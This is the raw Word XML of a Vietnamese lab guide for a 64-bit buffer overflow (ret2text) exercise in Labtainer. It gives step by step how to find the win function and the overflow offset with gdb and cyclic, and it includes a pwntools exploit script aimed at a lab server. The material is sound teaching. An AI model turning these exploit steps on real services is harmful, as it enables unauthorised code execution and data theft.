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D02" w:rsidRDefault="00085D02">
      <w:r>
        <w:t>Buffer Overflow: 64 bit application 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00085D02" w:rsidRDefault="00085D02">
      <w:r>
        <w:t>1. Tổng quan</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00085D02" w:rsidRDefault="00085D02">
      <w:r>
        <w:t xml:space="preserve">Lab này bao gồm mã nguồn của chương trình lỗi được biên dịch và chạy dưới kiến trúc 64-bit. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F7030" w:rsidRDefault="00085D02" w:rsidP="00085D02">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Yêu cầu đối với sinh viên</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F7030" w:rsidRDefault="009F7030" w:rsidP="009F7030">
      <w:r>
        <w:t>Sinh viên cần có kỹ năng sử dụng câu lệnh linux, hiểu biết thức nhất định về lập trình ngôn ngữ bậc thấp</w:t>
      </w:r>
      <w:r w:rsidR="009F2D42">
        <w:t>, biết sử dụng python phục vụ mục đích viết payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F7030" w:rsidRDefault="009F7030" w:rsidP="009F7030">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Môi trường lab</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00996AC3" w:rsidRDefault="00996AC3" w:rsidP="00996AC3">
      <w:r>
        <w:t>Từ thư mục labtainer-student bắt đầu bài lab bằng câu lệnh:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00996AC3" w:rsidRDefault="00996AC3" w:rsidP="00996AC3">
      <w:pPr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00E14B54">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidRPr="00E14B54">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>abtainer</w:t>
      </w:r>
      <w:r w:rsidR="00E14B54">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> -r</w:t>
      </w:r>
      <w:r w:rsidRPr="00E14B54">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> buf64_2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E14B54" w:rsidRDefault="00E14B54" w:rsidP="00996AC3">
      <w:r>
        <w:t>Sinh viên sẽ được cung cấp 3 container, trong đó:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E14B54" w:rsidRDefault="00E14B54" w:rsidP="00996AC3">
      <w:r>
        <w:t>+ Container attacker: chạy 2 terminal</w:t>
      </w:r>
      <w:r w:rsidR="005C6249">
        <w:t xml:space="preserve">, chứa binary của service chạy </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E14B54" w:rsidRDefault="00E14B54" w:rsidP="00996AC3">
      <w:r>
        <w:t>+ Container ghidra: chạy 1 terminal</w:t>
      </w:r>
      <w:r w:rsidR="005C6249">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="005C6249">
        <w:t>chứa binary của service chạy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E14B54" w:rsidRPr="00E14B54" w:rsidRDefault="00E14B54" w:rsidP="00996AC3">
      <w:r>
        <w:t xml:space="preserve">+ Container </w:t>
      </w:r>
      <w:r w:rsidR="005C6249">
        <w:t xml:space="preserve">server: chạy ẩn binary của service </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F7030" w:rsidRDefault="009F7030" w:rsidP="009F7030">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Tasks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E14B54" w:rsidRDefault="005C6249" w:rsidP="00E14B54">
      <w:r>
        <w:t xml:space="preserve">Mục đích bài lab: </w:t>
      </w:r>
      <w:r w:rsidR="00BD1E47">
        <w:t>Giúp sinh viên hiểu được về kỹ thuật tấn công buffer overflow Ret2</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidR="00BD1E47">
        <w:t>Text</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F7030" w:rsidRDefault="009F7030" w:rsidP="009F7030">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Print win</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00085D02" w:rsidRDefault="00996AC3" w:rsidP="009F7030">
      <w:r>
        <w:t>Mụ</w:t>
      </w:r>
      <w:r w:rsidR="003B666E">
        <w:t>c đích: Tìm được</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> địa chỉ hàm </w:t>
      </w:r>
      <w:r w:rsidR="009F7030">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>win</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00996AC3" w:rsidRDefault="003B666E" w:rsidP="009F7030">
      <w:r>
        <w:t>Các bước t</w:t>
      </w:r>
      <w:r w:rsidR="00996AC3">
        <w:t xml:space="preserve">hực hiện: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E14B54" w:rsidRDefault="005C6249" w:rsidP="005C6249">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Từ 1 terminal của attacker sử dụng gdb để debug file binary của service:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C6249" w:rsidRPr="00BF270F" w:rsidRDefault="005C6249" w:rsidP="005C6249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gdb buf64_2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C6249" w:rsidRDefault="005C6249" w:rsidP="005C6249">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Tại cửa sổ debug của gdb sử dụng lệnh để in ra địa chỉ của hàm win</w:t>
      </w:r>
      <w:r w:rsidR="006A438E">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C6249" w:rsidRPr="00BF270F" w:rsidRDefault="005C6249" w:rsidP="005C6249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print win hoặc p win</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C6249" w:rsidRDefault="005C6249" w:rsidP="005C6249">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Output là địa chỉ của hàm win dưới dạng hexa, lưu giá trị này lại phục vụ cho mục đích viết payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A438E" w:rsidRDefault="006A438E" w:rsidP="005C6249">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Thoát khỏi cửa sổ gdb:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A438E" w:rsidRPr="00BF270F" w:rsidRDefault="006A438E" w:rsidP="006A438E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quit hoặc q</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F7030" w:rsidRDefault="009F7030" w:rsidP="009F7030">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Found pattern </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B666E" w:rsidRDefault="003B666E" w:rsidP="003B666E">
      <w:r>
        <w:t>Mục đích: Tìm được độ dài pattern gây ra lỗi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B666E" w:rsidRDefault="003B666E" w:rsidP="003B666E">
      <w:r>
        <w:t xml:space="preserve">Các bước thực hiện:  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A438E" w:rsidRDefault="006A438E" w:rsidP="006A438E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Thực hiện sinh chuỗi pattern làm đầu vào bằng cách sử dụng lệnh trên cửa sổ terminal của attacker:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A438E" w:rsidRPr="00BF270F" w:rsidRDefault="006A438E" w:rsidP="006A438E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cyclic 200</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A438E" w:rsidRDefault="006A438E" w:rsidP="006A438E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Output của câu lệnh trên sẽ là chuỗi pattern có độ dài 200, copy chuỗi trên làm input để debug</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A438E" w:rsidRDefault="006A438E" w:rsidP="006A438E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Tiến hành chạy trình debug để debug file binary một lần nữa:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E1B3E" w:rsidRPr="00BF270F" w:rsidRDefault="006A438E" w:rsidP="006A438E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gdb buf64_2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E1B3E" w:rsidRDefault="008E1B3E" w:rsidP="008E1B3E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Chạy trình debug bằng cách sử dụng lệnh:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E1B3E" w:rsidRPr="00BF270F" w:rsidRDefault="008E1B3E" w:rsidP="008E1B3E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run hoặc r</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E1B3E" w:rsidRDefault="008E1B3E" w:rsidP="008E1B3E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Paste pattern đã gen khi tiến trình yêu cầu nhập input</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E1B3E" w:rsidRDefault="008E1B3E" w:rsidP="008E1B3E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Sau khi ấn enter, chương trình sẽ báo lỗi segmentation fault</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A434B" w:rsidRDefault="008E1B3E" w:rsidP="008E1B3E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Copy 4 </w:t>
      </w:r>
      <w:r w:rsidR="00DE7ED3">
        <w:t xml:space="preserve">ký tự </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">đầu của thanh ghi RSP ở phần </w:t>
      </w:r>
      <w:r w:rsidR="00F26034">
        <w:t>REGISTERS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A434B" w:rsidRDefault="009A434B" w:rsidP="008E1B3E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Thoát tiến trình debugger:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A434B" w:rsidRPr="00BF270F" w:rsidRDefault="009A434B" w:rsidP="009A434B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quit hoặc q</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A434B" w:rsidRDefault="009A434B" w:rsidP="009A434B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Tìm độ dài pattern gây ra lỗi bằng cách sử dụng cyclic:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A434B" w:rsidRPr="00BF270F" w:rsidRDefault="009A434B" w:rsidP="009A434B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cyclic –l “&lt;4 bytes đã copy&gt;”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2D42" w:rsidRPr="00BF270F" w:rsidRDefault="009A434B" w:rsidP="009A434B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VD: cyclic –l “saaa”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E14B54" w:rsidRDefault="009F2D42" w:rsidP="003B666E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Output sẽ là độ dài của pattern được sử dụng để tạo payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F7030" w:rsidRDefault="009F7030" w:rsidP="009F7030">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B666E" w:rsidRDefault="003B666E" w:rsidP="003B666E">
      <w:r>
        <w:t>Mục đích: Tìm được nội dung flag được giấu trên server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B666E" w:rsidRDefault="003B666E" w:rsidP="003B666E">
      <w:r>
        <w:t>Các bước thực hiện:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2D42" w:rsidRDefault="009F2D42" w:rsidP="009F2D42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Sử dụng lệnh nano để mở file payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2D42" w:rsidRPr="00BF270F" w:rsidRDefault="009F2D42" w:rsidP="009F2D42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nano solve.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2D42" w:rsidRDefault="009F2D42" w:rsidP="009F2D42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>File solve.py là file template sử dụng để tấn công service, mặc định file đã được setup để debug tiến trình buf64_2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F2D42" w:rsidRDefault="00DA1191" w:rsidP="009F2D42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Payload sẽ có cấu trúc dạng: pattern + return_address</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA1191" w:rsidRDefault="00DA1191" w:rsidP="009F2D42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Sử dụng pwntools để gửi payload, thêm dòng sau để thực hiện:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA1191" w:rsidRPr="00BF270F" w:rsidRDefault="00DA1191" w:rsidP="00DA1191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p.sendlineafter(b“&lt;&lt;”, cyclic(72) + p64(0x400707+16))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA1191" w:rsidRDefault="00DA1191" w:rsidP="00DA1191">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Lưu file và thoát sau đó tiến hành chạy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA1191" w:rsidRDefault="00DA1191" w:rsidP="00DA1191">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Tại một cửa sổ terminal của attacker tiến hành chạy file pwnserver để bắt tiến trình debugger:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA1191" w:rsidRPr="00BF270F" w:rsidRDefault="00DA1191" w:rsidP="00DA1191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./gdbpwn-server.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA1191" w:rsidRDefault="00DA1191" w:rsidP="00DA1191">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tại cửa sổ </w:t>
      </w:r>
      <w:r w:rsidR="00727BD3">
        <w:t>terminal còn lại của attacker tiến hành chạy file payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00727BD3" w:rsidRPr="00BF270F" w:rsidRDefault="00727BD3" w:rsidP="00727BD3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python3.8 solve.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00727BD3" w:rsidRDefault="00727BD3" w:rsidP="00727BD3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Khi này cửa sổ pwnserver sẽ bắt lấy trình debugger để có thể tương tác</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00727BD3" w:rsidRDefault="00727BD3" w:rsidP="00727BD3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Thực hiện gõ lệnh để tiếp tục chương trình:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00727BD3" w:rsidRPr="00BF270F" w:rsidRDefault="00727BD3" w:rsidP="00727BD3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c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00727BD3" w:rsidRDefault="00727BD3" w:rsidP="00727BD3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Tại cửa sổ chạy file payload ấn phím bất kì để tiếp tục tiến trình đang bị tạm dừng</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00727BD3" w:rsidRDefault="00727BD3" w:rsidP="00727BD3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Output có thể thấy tại trình debugger là câu lệnh cat được thực hiện thành công và nội dung flag local được in ra tại cửa sổ chạy payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00727BD3" w:rsidRDefault="00727BD3" w:rsidP="00727BD3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Tiến hành sửa payload để tấn công server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00727BD3" w:rsidRDefault="00727BD3" w:rsidP="00727BD3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Comment dòng p=elf.process() và gdb.attach(p) và thêm dòng p = remote(“192.168.1.2”, 1810)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00727BD3" w:rsidRDefault="00727BD3" w:rsidP="00727BD3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Tiến hành lưu và chạy lại file payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00727BD3" w:rsidRPr="00BF270F" w:rsidRDefault="00727BD3" w:rsidP="00727BD3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Python3.8 solve.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00727BD3" w:rsidRDefault="00727BD3" w:rsidP="00727BD3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Output là nội dung của file flag trên server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00727BD3" w:rsidRDefault="00727BD3" w:rsidP="00727BD3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Copy chuỗi số flag sau đó submit trên terminal của attacker bằng lệnh:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00727BD3" w:rsidRPr="00BF270F" w:rsidRDefault="00727BD3" w:rsidP="00727BD3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF270F">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>echo “flag &lt;number&gt;”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00085D02" w:rsidRDefault="00085D02"/>
    <w:p w:rsidR="001B68EE" w:rsidRDefault="001B68EE">
      <w:pPr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>payload cuối cùng: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5"/>
      </w:tblGrid>
      <w:tr w:rsidR="001B68EE" w:rsidTr="00BF270F">
        <w:trPr>
          <w:trHeight w:val="2636"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8615" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001B68EE" w:rsidRDefault="001B68EE" w:rsidP="001B6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pwn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</w:p>
          <w:p w:rsidR="001B68EE" w:rsidRDefault="001B68EE" w:rsidP="001B6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terminal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=[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'./gdbpwn-client.sh'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</w:p>
          <w:p w:rsidR="001B68EE" w:rsidRDefault="001B68EE" w:rsidP="001B6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elf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ELF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="00BF270F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'./buf64_2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1B68EE" w:rsidRDefault="001B68EE" w:rsidP="001B6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#p = elf.process()</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001B68EE" w:rsidRDefault="001B68EE" w:rsidP="001B6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#gdb.attach(p)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001B68EE" w:rsidRDefault="001B68EE" w:rsidP="001B6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#pause()</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001B68EE" w:rsidRDefault="001B68EE" w:rsidP="001B6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'192.168.1.2'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1810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1B68EE" w:rsidRDefault="001B68EE" w:rsidP="001B68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sendlineafter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b'&lt;&lt;'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cyclic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72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0x400707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:rsidR="001B68EE" w:rsidRDefault="001B68EE" w:rsidP="001B68EE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interactive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</w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="001B68EE" w:rsidRPr="001B68EE" w:rsidRDefault="001B68EE"/>
    <w:sectPr w:rsidR="001B68EE" w:rsidRPr="001B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D3A6E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4EFCA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6528FB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8DD237C2"/>
    <w:lvl w:ilvl="0" w:tplc="68B697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02"/>
    <w:rsid w:val="00085D02"/>
    <w:rsid w:val="001427F8"/>
    <w:rsid w:val="001B68EE"/>
    <w:rsid w:val="003B666E"/>
    <w:rsid w:val="005C6249"/>
    <w:rsid w:val="00616DA8"/>
    <w:rsid w:val="006A438E"/>
    <w:rsid w:val="00727BD3"/>
    <w:rsid w:val="008E1B3E"/>
    <w:rsid w:val="00996AC3"/>
    <w:rsid w:val="009A434B"/>
    <w:rsid w:val="009F2D42"/>
    <w:rsid w:val="009F7030"/>
    <w:rsid w:val="00A03BF2"/>
    <w:rsid w:val="00BD1E47"/>
    <w:rsid w:val="00BF270F"/>
    <w:rsid w:val="00DA1191"/>
    <w:rsid w:val="00DE7ED3"/>
    <w:rsid w:val="00E14B54"/>
    <w:rsid w:val="00F2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2E7E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{7B87DD0F-1880-4AA6-ABB8-377C38D0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02"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="001B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sv_anhddq</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>sv_anhddq</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-12-01T02:54:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-01T12:15:00Z</dcterms:modified>
</cp:coreProperties>
</file>